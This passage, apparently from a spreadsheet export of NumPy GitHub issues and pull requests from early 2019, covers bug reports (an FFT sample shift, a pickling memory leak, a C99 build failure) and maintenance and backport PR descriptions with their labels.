pyplot.show()_x000D_
_x000D_
# with length=1023 everything is ok, but with length=1024 there is a shift of one sample. if you zoom the plot you can clearly see it. it can be resolved with numpy.roll(abs(right), 1)_x000D_
_x000D_
##############################_x000D_
_x000D_
"""_x000D_
check time reversal_x000D_
$F(x(-t)) = (F(x))(-\omega)$_x000D_
"""_x000D_
_x000D_
left = numpy.fft.fftshift(numpy.fft.fft(numpy.flip(complex_data)))_x000D_
right = numpy.flip(numpy.fft.fftshift(numpy.fft.fft(complex_data)))_x000D_
_x000D_
print(numpy.isclose(left, right, atol=0.00001).all())_x000D_
_x000D_
pyplot.plot(abs(left), label='abs(left)')_x000D_
pyplot.plot(abs(right), label='abs(right)')_x000D_
pyplot.legend()_x000D_
pyplot.show()_x000D_
_x000D_
# both with length=1023 and length=1024 there is a shift of one sample. if you zoom the plot you can clearly see it. it can be resolved with numpy.roll(abs(right), 1)_x000D_
```_x000D_
_x000D_
Numpy/Python version information:_x000D_
_x000D_
```_x000D_
import sys, numpy_x000D_
print(numpy.__version__)_x000D_
print(sys.version)_x000D_
_x000D_
&gt;&gt;&gt; 1.15.3_x000D_
&gt;&gt;&gt; 3.6.7 |Anaconda custom (64-bit)| (default, Oct 23 2018, 19:16:44) [GCC 7.3.0]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>erroneous shift of one sample when checking complex conjugation and time reversal with Fourier transform</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import pickle_x000D_
import os_x000D_
import itertools_x000D_
import psutil_x000D_
import gc_x000D_
import sys_x000D_
_x000D_
print ('NumPy version:', np.__version__, 'Python version:', sys.version)_x000D_
for i in itertools.count():_x000D_
    pickle.dumps(np.zeros(1024*1024))_x000D_
    gc.collect()_x000D_
    if i % 100 == 0:_x000D_
        info = psutil.Process(os.getpid()).memory_info()_x000D_
        print(f'vms={info.vms/1024/1024}MB rss={info.rss/1024/1024}MB')_x000D_
```_x000D_
_x000D_
### Output on NumPy 1.15.4_x000D_
_x000D_
```_x000D_
NumPy version: 1.15.4 Python version: 3.6.3 (default, Nov 23 2017, 18:55:59) _x000D_
[GCC 5.4.0 20160609]_x000D_
vms=434.71875MB rss=27.421875MB_x000D_
vms=434.72265625MB rss=27.52734375MB_x000D_
vms=434.72265625MB rss=27.52734375MB_x000D_
vms=434.72265625MB rss=27.52734375MB_x000D_
vms=434.72265625MB rss=27.52734375MB_x000D_
vms=434.72265625MB rss=27.52734375MB_x000D_
vms=434.72265625MB rss=27.52734375MB_x000D_
vms=434.72265625MB rss=27.52734375MB_x000D_
```_x000D_
_x000D_
### Output on NumPy 1.16.0_x000D_
_x000D_
```_x000D_
$ python test.py_x000D_
NumPy version: 1.16.0 Python version: 3.6.3 (default, Nov 23 2017, 18:55:59) _x000D_
[GCC 5.4.0 20160609]_x000D_
vms=431.58984375MB rss=27.34765625MB_x000D_
vms=1239.5859375MB rss=827.47265625MB_x000D_
vms=2039.58984375MB rss=1627.4765625MB_x000D_
vms=2839.58984375MB rss=2427.4765625MB_x000D_
vms=3639.59375MB rss=3227.4921875MB_x000D_
vms=4439.59375MB rss=4027.5078125MB_x000D_
vms=5239.59375MB rss=4827.51953125MB_x000D_
vms=6039.59765625MB rss=5627.5390625MB_x000D_
```</t>
  </si>
  <si>
    <t xml:space="preserve">Memory leak when pickling ndarrays with NumPy 1.16.0 </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Get this error message when try to import numpy (and other lib have dependency on numpy) - version 1.14.0:_x000D_
_x000D_
"Importing the multiarray numpy extension module failed.  Most_x000D_
likely you are trying to import a failed build of numpy..._x000D_
Original error was: DLL load failed: The specified path is invalid."_x000D_
_x000D_
I am using Python from &lt;USERPATH&gt;\Anaconda\python.exe (the only Python version in my machine - 3.6), install the package using pip, reinstall many times with forcing updated version, even reinstall Anaconda but does not work._x000D_
_x000D_
I am using company Pypi internal repo so not allow accesses to outside resource. My colleague who having the same installment but his numpy works normally. </t>
  </si>
  <si>
    <t>Issue with importing numpy</t>
  </si>
  <si>
    <t xml:space="preserve">When using the latest Numpy, pandas, and tables packages with Python 3.7.2, I was unable to read HDF5 files that I had written using pandas.  This only appears to be a problem for 'object' datatypes in pandas dataframes.  I could write the hdf5 files, however._x000D_
_x000D_
Perhaps this is a bug with pandas or tables, I'm not sure.  All I know is after downgrading numpy to 1.15, I was able to read/write pandas dataframes with object datatypes as HDF5 files._x000D_
_x000D_
It looks like this may be related: https://github.com/nipy/nibabel/issues/697_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import pandas as pd_x000D_
df = pd.DataFrame(data={'d': ['a', 'b', 'c']})_x000D_
df.to_hdf('test.hdf', key='data')_x000D_
df = pd.read_hdf('test.hdf')_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```python_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-1-f757457e8111&gt; in &lt;module&gt;_x000D_
      2 df = pd.DataFrame(data={'d': ['a', 'b', 'c']})_x000D_
      3 df.to_hdf('test.hdf', key='data')_x000D_
----&gt; 4 df = pd.read_hdf('test.hdf')_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/pandas/io/pytables.py in read_hdf(path_or_buf, key, mode, **kwargs)_x000D_
    392                                      'contains multiple datasets.')_x000D_
    393             key = candidate_only_group._v_pathname_x000D_
--&gt; 394         return store.select(key, auto_close=auto_close, **kwargs)_x000D_
    395     except:_x000D_
    396         # if there is an error, close the store_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/pandas/io/pytables.py in select(self, key, where, start, stop, columns, iterator, chunksize, auto_close, **kwargs)_x000D_
    739                            chunksize=chunksize, auto_close=auto_close)_x000D_
    740 _x000D_
--&gt; 741         return it.get_result()_x000D_
    742 _x000D_
    743     def select_as_coordinates(_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/pandas/io/pytables.py in get_result(self, coordinates)_x000D_
   1481 _x000D_
   1482         # directly return the result_x000D_
-&gt; 1483         results = self.func(self.start, self.stop, where)_x000D_
   1484         self.close()_x000D_
   1485         return results_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/pandas/io/pytables.py in func(_start, _stop, _where)_x000D_
    732             return s.read(start=_start, stop=_stop,_x000D_
    733                           where=_where,_x000D_
--&gt; 734                           columns=columns)_x000D_
    735 _x000D_
    736         # create the iterator_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/pandas/io/pytables.py in read(self, start, stop, **kwargs)_x000D_
   2935             blk_items = self.read_index('block%d_items' % i)_x000D_
   2936             values = self.read_array('block%d_values' % i,_x000D_
-&gt; 2937                                      start=_start, stop=_stop)_x000D_
   2938             blk = make_block(values,_x000D_
   2939                              placement=items.get_indexer(blk_items))_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/pandas/io/pytables.py in read_array(self, key, start, stop)_x000D_
   2487 _x000D_
   2488         if isinstance(node, tables.VLArray):_x000D_
-&gt; 2489             ret = node[0][start:stop]_x000D_
   2490         else:_x000D_
   2491             dtype = getattr(attrs, 'value_type', None)_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/tables/vlarray.py in __getitem__(self, key)_x000D_
    679                 key += self.nrows_x000D_
    680             (start, stop, step) = self._process_range(key, key + 1, 1)_x000D_
--&gt; 681             return self.read(start, stop, step)[0]_x000D_
    682         elif isinstance(key, slice):_x000D_
    683             start, stop, step = self._process_range(_x000D_
_x000D_
~/numpy_bug/lib/python3.7/site-packages/tables/vlarray.py in read(self, start, stop, step)_x000D_
    819             listarr = []_x000D_
    820         else:_x000D_
--&gt; 821             listarr = self._read_array(start, stop, step)_x000D_
    822 _x000D_
    823         atom = self.atom_x000D_
_x000D_
tables/hdf5extension.pyx in tables.hdf5extension.VLArray._read_array()_x000D_
_x000D_
ValueError: cannot set WRITEABLE flag to True of this array_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.0 3.7.2 (default, Jan 16 2019, 22:34:11) _x000D_
[GCC 7.3.0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Issue reading HDF files with numpy 1.16.0</t>
  </si>
  <si>
    <t>This is the alternative approach to #12523, which currently has a lot of debug code and actually breaks the Windows builds --  you can take a look in the Azure output if you want._x000D_
_x000D_
I've not had success getting this to work on Windows, even if I put all the DLL / lib files at the same path._x000D_
_x000D_
Open to suggestions, otherwise the extension building in the original PR may be preferred so that we can be agnostic to static / dynamic details. Not sure any approach is really going to be fully portable to all the scenarios that other libraries may have for openblas version access.</t>
  </si>
  <si>
    <t>ENH: alternative (ctypes) approach to openblas version access</t>
  </si>
  <si>
    <t xml:space="preserve">This aims to improve the test suite for numpy.pad in anticipation for #11358. E.g. refactor the classes ValueError1, ValueError2, ..., add some missing edge cases and  group tests that cover the same aspect of pad. e67ecc3 actually removes ineffective unit tests. </t>
  </si>
  <si>
    <t>TST: Improve tests for numpy.pad</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12762._x000D_
_x000D_
Check for local file first to avoid need to import urllib modules in_x000D_
numpy._datasource.py. See #12536_x000D_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</si>
  <si>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Change the order of checking for local file.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '08 - Backport', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>No need for `if __name__ == "__main__"` with pytest</t>
  </si>
  <si>
    <t>DOC: remove recommendation to add main for testing</t>
  </si>
  <si>
    <t>dtype instances have a `base` attribute that, I think, is meant to be the "base dtype" for subarrays. It is, however, not documented, leading to hesitation with and confusion about its use.  See_x000D_
https://stackoverflow.com/questions/52476601/purpose-status-of-the-attribute-numpy-dtype-base and https://github.com/astropy/astropy/pull/8353#issuecomment-454945823_x000D_
_x000D_
My sense is that it is useful and should just be documented properly.</t>
  </si>
  <si>
    <t>Dtype.base attribute not documented</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: Documentation', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>Was all working until recently. Now I get this error when I try to import bcolz._x000D_
_x000D_
I have tried pinning numpy version to 1.14.2. I have tried installing numpy first. Tried uninstalling numpy and reinstalling which just gives me different errors - compile failed with error code 1. Tried adding --no-cache-dir._x000D_
_x000D_
Stuck as can't even go back to where I was!</t>
  </si>
  <si>
    <t>numpy.ufunc has the wrong size, try recompiling. Expected 192, got 216</t>
  </si>
  <si>
    <t>The void scalar was missing the clearing logic for the buffer info_x000D_
cache (or storage)._x000D_
_x000D_
It should maybe be checked whether we can replace all of this logic_x000D_
when not supporting Python 2 anymore._x000D_
_x000D_
-----_x000D_
_x000D_
This is a followup on gh-12624. After this, the test suit should be clean in the sense of valgrind definitely lost leaks (except for the outstanding gh-12650 and more tricky gh-12633 for f2py) [1]. I think if we drop python 2, there *may* be a reorganizing happening here anyway. Also I am not sure if Matti's changes touch similar things (but doubt it). There is a similar path for `object`, but I do not think those really exists?!_x000D_
_x000D_
[1] Note that there is still a "leak" (detected, but not true) of one or two buffer info's, because the singletons `np.bool_(True)` and `np.bool_(False)` get never cleared, and so their cached `buffer_info` also does not get cleared.</t>
  </si>
  <si>
    <t>BUG: Fix leak of void scalar buffer info</t>
  </si>
  <si>
    <t>Fixes #12766 _x000D_
_x000D_
Ralf already documented the C99 requirement in an `INSTALL` doc file in #12620, so this is just adding similar content to the developer docs based on the request in the linked issue. I suppose there's always some discussion to be had about the best place to put this stuff.</t>
  </si>
  <si>
    <t>DOC: document C99 requirement in dev guide</t>
  </si>
  <si>
    <t xml:space="preserve">Despite the strange tone, gh-12674 did identify a series of low-impact bugs in PyArray_RegisterCanCast_x000D_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</si>
  <si>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Ensure failing memory allocations are reported</t>
  </si>
  <si>
    <t>This fixes reference counting for subarrays containing objects. Note that the 3rd commit is currently a WIP and mostly a proof that fixing up assignment like this works to not lose references. It may well approximate the correct solution, but I am not 100% sure._x000D_
_x000D_
This PR contains changes moved from gh-12624</t>
  </si>
  <si>
    <t>BUG: Fix reference counting for subarrays containing objects</t>
  </si>
  <si>
    <t>I apologize in advance for the unsatisfactory nature of this PR, but I would appreciate some guidance._x000D_
_x000D_
For scikit-image, we've been co-opting `numpy.lookfor` for a long time to find functions inside of the library.  It stopped working this week.  The culprit was a binary module, for which `item.__path__` was not defined._x000D_
_x000D_
This patch ignores items for which `item.__path__` doesn't at least translate to a non-empty string.  But I am not sure how to test this approach.  Any thoughts?</t>
  </si>
  <si>
    <t>Fix numpy lookfor for extension modules where path is None</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12634._x000D_
_x000D_
Highly modified. The only fixes preserved from the original are some matplotlib imports, as most of the original problems originated with fixing up the doctests so that they passed the testing used in 1.17.0-dev._x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC, TST: Clean up matplotlib imports</t>
  </si>
  <si>
    <t>['04 - Documentation', '05 - Testing', '08 - Backport']</t>
  </si>
  <si>
    <t>Also switches to using a parametrized test, for better error messages_x000D_
_x000D_
Fixes the windows problem I reported on #12583</t>
  </si>
  <si>
    <t>BUG,TST: Remove the misguided `run_command` that wraps subprocess</t>
  </si>
  <si>
    <t>I may add more fixes, but right now the output is pretty spammed by some errors for not cleaned up dtypes and I am not sure where that comes from. (compare also gh-12615)_x000D_
_x000D_
_x000D_
-------_x000D_
_x000D_
Edit, track things that still leak. I do not think we should wait for all of these to be tracked down, some of them are probably very difficult to find._x000D_
  - Array objects seem are being leaked in_x000D_
      - [x] `test_nditer.py`_x000D_
      - [x] `test_arrayprint.py` (or maybe it were only dtypes to begin with)_x000D_
  - [x] Rare python float being leaked in masked array tests, created during dtype with fields copy or similar._x000D_
  - [x] (at least mostly done, rerun of tests necessary) dtypes leak in some places, it is plausible that many are for the same reasons:_x000D_
     - [x] `test_arrayprint.py`_x000D_
      - `test_defchararray.py`_x000D_
      - `test_ufuncs.py`_x000D_
      - `test_memoverlap.py`._x000D_
  - [x] Tuples, for example in `test_recfunctions.py` (maybe some tuple stored but not cleaned up by dtypes?) and `test_ufuncs.py`._x000D_
  - [x] `test_ufunc.py`leaks https://github.com/numpy/numpy/blob/master/numpy/core/src/umath/ufunc_object.c#L2666_x000D_
    (probably just the free missing)._x000D_
  - **Won't fix now:** Most /many (not `test_array_from_pyobj.py` maybe more) f2py tests leak `PyFortranObject`s_x000D_
  - [x] A few leaks datetime related, e.g. `test_datetime.py`_x000D_
  - [x] ... Probably some I forgot_x000D_
  - **Won't investigate** I see a python leak always, may check python-dbg build to see where it comes from._x000D_
_x000D_
Some tests are needed:_x000D_
  - ~[ ] Object dtype subarray reference count test.~_x000D_
  - … please add more if you want._x000D_
_x000D_
-------_x000D_
_x000D_
Hack I am using right now is to run the following script (after cleaning up and running pytest to cache the build with debugging):_x000D_
```_x000D_
#!/usr/bin/env python_x000D_
_x000D_
import sys_x000D_
import glob_x000D_
from subprocess import call_x000D_
_x000D_
if len(sys.argv) &gt; 1:_x000D_
    tests = sys.argv[1:]_x000D_
else:_x000D_
    tests = glob.glob("numpy/**/tests/test*.py")_x000D_
_x000D_
for test in tests:_x000D_
    print("Running test:", test)_x000D_
    call("PYTHONMALLOC=malloc valgrind --show-leak-kinds=definite --leak-check=full "_x000D_
         "python runtests.py -t {} -- --continue-on-collection-errors &amp;&gt; results/{}".format(_x000D_
              test, test.replace("/", "_")), shell=True)_x000D_
```_x000D_
to get at least test file specific output of the leaks (of course you can bisect to find a test that triggers manually then, but it is pretty time consuming), would be need to have a better way, but probably not important enough.</t>
  </si>
  <si>
    <t>BUG: Fix incorrect/missing reference cleanups found using valgrind</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12591_x000D_
_x000D_
Example behavior:_x000D_
_x000D_
&gt;&gt;&gt; x = np.array([1, 2, 3])_x000D_
&gt;&gt;&gt; y = np.array([1, 2, 3.0001])_x000D_
&gt;&gt;&gt; np.testing.assert_allclose(x, y)_x000D_
AssertionError:_x000D_
Not equal to tolerance rtol=1e-07, atol=0_x000D_
_x000D_
Mismatch: 33.3%_x000D_
Max absolute difference: 0.0001_x000D_
Max relative difference: 3.33322223e-05_x000D_
 x: array([1, 2, 3])_x000D_
 y: array([1.    , 2.    , 3.0001])_x000D_
_x000D_
Motivation: when writing numerical algorithms, I frequently find myself_x000D_
experimenting to pick the right value of `atol` and `rtol` for_x000D_
`np.testing.assert_allclose()`. If I make the tolerance too generous, I risk_x000D_
missing regressions in accuracy, so I usually try to pick the smallest values_x000D_
for which tests pass. This change immediately reveals appropriate values to_x000D_
use for these parameters, so I don't need to guess and check._x000D_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</si>
  <si>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add "max difference" messages to np.testing.assert_array_equal .</t>
  </si>
  <si>
    <t>['01 - Enhancement', '08 - Backport', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>See gh-7427._x000D_
_x000D_
@isuruf given that this is a tweak of your PR, would you mind looking this over?</t>
  </si>
  <si>
    <t>MAINT: add warning to numpy.distutils for LDFLAGS append behavior.</t>
  </si>
  <si>
    <t xml:space="preserve">Add a check for NaN probabilities in random.choice_x000D_
_x000D_
closes #11250_x000D_
</t>
  </si>
  <si>
    <t>BUG: Ensure probabilities are not NaN in choice</t>
  </si>
  <si>
    <t xml:space="preserve">[ci skip]_x000D_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</si>
  <si>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WIP, DOC: Create 1.16.1 release notes.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12456._x000D_
_x000D_
This also improves `np.ctypeslib.as_ctypes` to support more types of array:_x000D_
* non-native endianness_x000D_
* structured arrays with non-overlapping fields_x000D_
* booleans_x000D_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</si>
  <si>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Add np.ctypeslib.as_ctypes_type(dtype), improve `np.ctypeslib.as_ctypes`</t>
  </si>
  <si>
    <t>['01 - Enhancement', '08 - Backport', 'component: numpy.ctypes']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12317._x000D_
_x000D_
**TL,DR:** This significantly speeds up dispatch for `__array_function__`, reducing the overhead down to about 0.7 microseconds for typical cases (vs 2-3 microseconds currently with a pure Python implementation). For functions that handle many arguments (like `concatenate`), this reduces the overhead of dispatching by something like 100x, i.e., from "makes concatenate 4x slower" to "barely unnoticeable"._x000D_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</si>
  <si>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port np.core.overrides to C for speed</t>
  </si>
  <si>
    <t>['03 - Maintenance', '08 - Backport', 'component: __array_function__', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport #12308 _x000D_
_x000D_
Motivated by #12120 (comment)_x000D_
_x000D_
* add support for floor division between timedelta64 (m8) operands with generic or specific units;_x000D_
  type signature is mm-&gt;q_x000D_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</si>
  <si>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add mm-&gt;q floordiv</t>
  </si>
  <si>
    <t>['01 - Enhancement', '08 - Backport', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t>When I attempt to build on RHEL 7.3, I get an error unless I manually do_x000D_
_x000D_
    (numpy-testing-py3) [jfoxrabi@... numpy]$ export CFLAGS=-std=c99_x000D_
_x000D_
Here is my console session without setting the flag (forgive me for using ./runtests.py. I still haven't figured out a better shortcut for getting the log and running the test simultaneously):_x000D_
_x000D_
```_x000D_
(numpy-testing-py3) [jfoxrabi@... numpy]$ echo $CFLAGS_x000D_
_x000D_
(numpy-testing-py3) [jfoxrabi@... numpy]$ ./runtests.py _x000D_
Building, see build.log..._x000D_
    ... build in progress_x000D_
Processing numpy/random/mtrand/randint_helpers.pxi.in_x000D_
Processing numpy/random/mtrand/mtrand.pyx_x000D_
Cythonizing sources_x000D_
blas_opt_info:_x000D_
blas_mkl_info:_x000D_
customize UnixCCompiler_x000D_
  FOUND:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/usr/local/include', '/usr/include', '/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/include']_x000D_
_x000D_
  FOUND:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/usr/local/include', '/usr/include', '/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/include']_x000D_
_x000D_
non-existing path in 'numpy/distutils': 'site.cfg'_x000D_
lapack_opt_info:_x000D_
lapack_mkl_info:_x000D_
customize UnixCCompiler_x000D_
  FOUND:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/usr/local/include', '/usr/include', '/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/include']_x000D_
_x000D_
  FOUND:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/usr/local/include', '/usr/include', '/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/include']_x000D_
_x000D_
running build_x000D_
running config_cc_x000D_
unifing config_cc, config, build_clib, build_ext, build commands --compiler options_x000D_
running config_fc_x000D_
unifing config_fc, config, build_clib, build_ext, build commands --fcompiler options_x000D_
running build_src_x000D_
build_src_x000D_
building py_modules sources_x000D_
creating build/src.linux-x86_64-3.6_x000D_
creating build/src.linux-x86_64-3.6/numpy_x000D_
creating build/src.linux-x86_64-3.6/numpy/distutils_x000D_
building library "npymath" sources_x000D_
get_default_fcompiler: matching types: '['gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq', 'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor']'_x000D_
customize Gnu95FCompiler_x000D_
Found executable /home/jfoxrabi/miniconda3/envs/numpy-testing-py3/bin/gfortran_x000D_
customize Gnu95FCompiler_x000D_
customize Gnu95FCompiler using config_x000D_
C compiler: gcc -pthread -B /home/jfoxrabi/miniconda3/envs/numpy-testing-py3/compiler_compat -Wl,--sysroot=/ -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -Werror=vla -Werror=nonnull -Werror=pointer-arith -Wlogical-op -Werror=unused-function -fPIC_x000D_
_x000D_
compile options: '-Inumpy/core/src/common -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/include/python3.6m -c'_x000D_
gcc: _configtest.c_x000D_
gcc -pthread -B /home/jfoxrabi/miniconda3/envs/numpy-testing-py3/compiler_compat -Wl,--sysroot=/ _configtest.o -o _configtest_x000D_
success!_x000D_
removing: _configtest.c _configtest.o _configtest.o.d _configtest_x000D_
C compiler: gcc -pthread -B /home/jfoxrabi/miniconda3/envs/numpy-testing-py3/compiler_compat -Wl,--sysroot=/ -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -Werror=vla -Werror=nonnull -Werror=pointer-arith -Wlogical-op -Werror=unused-function -fPIC_x000D_
_x000D_
compile options: '-Inumpy/core/src/common -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/include/python3.6m -c'_x000D_
gcc: _configtest.c_x000D_
_configtest.c:1:5: warning: conflicting types for built-in function ‘exp’ [enabled by default]_x000D_
 int exp (void);_x000D_
     ^_x000D_
gcc -pthread -B /home/jfoxrabi/miniconda3/envs/numpy-testing-py3/compiler_compat -Wl,--sysroot=/ _configtest.o -o _configtest_x000D_
/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/compiler_compat/ld: _configtest.o: in function `main':_x000D_
/home/jfoxrabi/Documents/OTS/numpy/_configtest.c:6: undefined reference to `exp'_x000D_
collect2: error: ld returned 1 exit status_x000D_
_x000D_
&lt;... SNIP ...&gt;_x000D_
_x000D_
numpy/fft/pocketfft.c:2042:3: error: ‘for’ loop initial declarations are only allowed in C99 mode_x000D_
   for (size_t m=0; m&lt;n; ++m)_x000D_
   ^_x000D_
numpy/fft/pocketfft.c: In function ‘rfftblue_forward’:_x000D_
numpy/fft/pocketfft.c:2054:3: error: ‘for’ loop initial declarations are only allowed in C99 mode_x000D_
   for (size_t m=0; m&lt;n; ++m)_x000D_
   ^_x000D_
numpy/fft/pocketfft.c: In function ‘execute_complex’:_x000D_
numpy/fft/pocketfft.c:2213:7: error: ‘for’ loop initial declarations are only allowed in C99 mode_x000D_
       for (int i = 0; i &lt; nrepeats; i++) {_x000D_
       ^_x000D_
numpy/fft/pocketfft.c: In function ‘execute_real_forward’:_x000D_
numpy/fft/pocketfft.c:2246:5: error: ‘for’ loop initial declarations are only allowed in C99 mode_x000D_
     for (int d=0; d&lt;ndim-1; ++d)_x000D_
     ^_x000D_
numpy/fft/pocketfft.c:2265:9: error: ‘for’ loop initial declarations are only allowed in C99 mode_x000D_
         for (int i = 0; i &lt; nrepeats; i++) {_x000D_
         ^_x000D_
numpy/fft/pocketfft.c: In function ‘execute_real_backward’:_x000D_
numpy/fft/pocketfft.c:2310:9: error: ‘for’ loop initial declarations are only allowed in C99 mode_x000D_
         for (int i = 0; i &lt; nrepeats; i++) {_x000D_
         ^_x000D_
Running from numpy source directory._x000D_
/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/lib/python3.6/distutils/dist.py:261: UserWarning: Unknown distribution option: 'define_macros'_x000D_
  warnings.warn(msg)_x000D_
error: Command "gcc -pthread -B /home/jfoxrabi/miniconda3/envs/numpy-testing-py3/compiler_compat -Wl,--sysroot=/ -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -Werror=vla -Werror=nonnull -Werror=pointer-arith -Wlogical-op -Werror=unused-function -fPIC -Inumpy/core/include -Ibuild/src.linux-x86_64-3.6/numpy/core/include/numpy -Inumpy/core/src/common -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/home/jfoxrabi/miniconda3/envs/numpy-testing-py3/include/python3.6m -Ibuild/src.linux-x86_64-3.6/numpy/core/src/common -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -Ibuild/src.linux-x86_64-3.6/numpy/core/src/common -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -c numpy/fft/pocketfft.c -o build/temp.linux-x86_64-3.6/numpy/fft/pocketfft.o -MMD -MF build/temp.linux-x86_64-3.6/numpy/fft/pocketfft.o.d" failed with exit status 1_x000D_
_x000D_
Build failed!_x000D_
```_x000D_
_x000D_
[Complete failed build.log](https://github.com/numpy/numpy/files/2766190/build.log)_x000D_
_x000D_
As soon as I set `CFLAGS`, the build completes and the tests start to run:_x000D_
_x000D_
```_x000D_
(numpy-testing-py3) [jfoxrabi@... numpy]$ export CFLAGS=-std=c99_x000D_
(numpy-testing-py3) [jfoxrabi@... numpy]$ ./runtests.py _x000D_
Building, see build.log..._x000D_
Build OK_x000D_
NumPy version 1.17.0.dev0+8aedcc0_x000D_
NumPy relaxed strides checking option: True_x000D_
.................x...................................................... [  0%]_x000D_
........................................................................ [  1%]_x000D_
........................................................................ [  2%]_x000D_
........................................................................ [  3%]_x000D_
......................ssss................................x............s [  4%]_x000D_
........................................................................ [  5%]_x000D_
........................................................................ [  6%]_x000D_
........................................................................ [  7%]_x000D_
........................................................................ [  8%]_x000D_
........................................................................ [  9%]_x000D_
.................................................................sss.... [ 10%]_x000D_
........................................................................ [ 11%]_x000D_
...........................s.......................xx........s.......... [ 12%]_x000D_
_x000D_
&lt;... SNIP ...&gt;_x000D_
```_x000D_
_x000D_
[Complete successful build.log](https://github.com/numpy/numpy/files/2766210/build.log)_x000D_
_x000D_
This looks like the `-std=c99` flag is not being set explicitly somewhere, and my compiler does not assume it._x000D_
_x000D_
For completeness, I am running in an Anaconda environment (named `numpy-testing-py3`), running Python 3.6.8, installing numpy commit  8aedcc0129b9fa7e1785aa11779cbc1c1b3d3395 (my branch for #10855), which is effectively `master` at 49689f7be478fe9a4d33761b080eb6aef3f8f899._x000D_
_x000D_
I have edited out my hostname, but not the paths or user name because the former are at fairly standard locations, and the latter is publicly available.</t>
  </si>
  <si>
    <t>DOC: Missing -std=c99 flags somewhere?</t>
  </si>
  <si>
    <t>Backport #12683 along with a release note for `1.16.1`. The plan would then be to merge that PR without a release note &amp; then forward port the maintenance branch release notes as usual eventually._x000D_
_x000D_
In doing the above backport work I noticed that `m8` floordiv was not present before the `1.16.x` branch point, so I've had to cherry-pick #12308 as well for tests to pass, along with a release note mention._x000D_
_x000D_
Good idea to look over the diff considering the amount of merge conflict work I did. The commits are, in theory, cherry-picked in reverse order with divmod implemented before floordiv, but should be same effect in the end I hope.</t>
  </si>
  <si>
    <t xml:space="preserve">MAINT: Backport gh-12683, 12308 </t>
  </si>
  <si>
    <t>Related to #12736._x000D_
_x000D_
~Use relative imports to ensure we are loading modules from the current directory, and d~Detect use of an old `multiarray` module._x000D_
_x000D_
This might solve the issue reported when users are updating numpy and `import numpy` finds an old `multiarray` c-extension module rather than the new pure-python wrapper. It will also produce a message with more helpful information._x000D_
_x000D_
